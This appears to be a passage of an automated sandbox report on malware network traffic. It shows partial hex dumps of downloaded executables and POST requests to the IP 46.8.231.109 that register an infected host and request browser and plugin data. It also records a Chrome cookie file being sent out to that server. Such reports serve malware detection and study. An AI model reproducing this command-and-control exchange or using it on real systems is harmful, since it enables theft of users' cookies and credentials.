00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:10 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:19 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:19 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIDAFCGIEHIEBFCFBAHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 32 42 43 34 44 36 34 38 39 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 49 44 41 46 43 47 49 45 48 49 45 42 46 43 46 42 41 2d 2d 0d 0a Data Ascii: ------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="hwid"62BC4D6489FB4109353171------DGHIDAFCGIEHIEBFCFBAContent-Disposition: form-data; name="build"default------DGHIDAFCGIEHIEBFCFBA--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 4b 46 49 4a 4a 4b 4a 4a 4a 4b 45 42 4b 4a 45 48 2d 2d 0d 0a Data Ascii: ------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------HIDAKFIJJKJJJKEBKJEHContent-Disposition: form-data; name="message"browsers------HIDAKFIJJKJJJKEBKJEH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGHHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="message"plugins------IJDGIIEBFCBAAAAKKEGH--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKECAEBGHDAEBFHIEGHIHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 43 41 45 42 47 48 44 41 45 42 46 48 49 45 47 48 49 2d 2d 0d 0a Data Ascii: ------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------BKECAEBGHDAEBFHIEGHIContent-Disposition: form-data; name="message"fplugins------BKECAEBGHDAEBFHIEGHI--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJDAFHJDHIEBGCFIDBHost: 46.8.231.109Content-Length: 6063Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCGHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 47 2d 2d 0d 0a Data Ascii: ------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KEBFHIJECFIDGDGCGHCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="file"------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFCGIDAKECGCBGDBAFIHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 62 38 62 65 64 36 63 61 39 36 35 65 38 38 36 34 39 33 30 61 63 38 38 32 65 35 66 38 64 61 37 61 30 33 30 63 63 39 39 66 65 64 34 39 30 63 64 64 65 33 66 62 39 39 33 33 35 33 31 34 66 37 30 39 32 38 38 36 35 66 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 43 47 49 44 41 4b 45 43 47 43 42 47 44 42 41 46 49 2d 2d 0d 0a Data Ascii: ------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="token"8b8bed6ca965e8864930ac882e5f8da7a030cc99fed490cdde3fb99335314f70928865f2------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FBFCGIDAKECGCBGDBAFIContent-Disposition: form-data; name="file"------FBFCGIDAKECGCBGDBAFI--
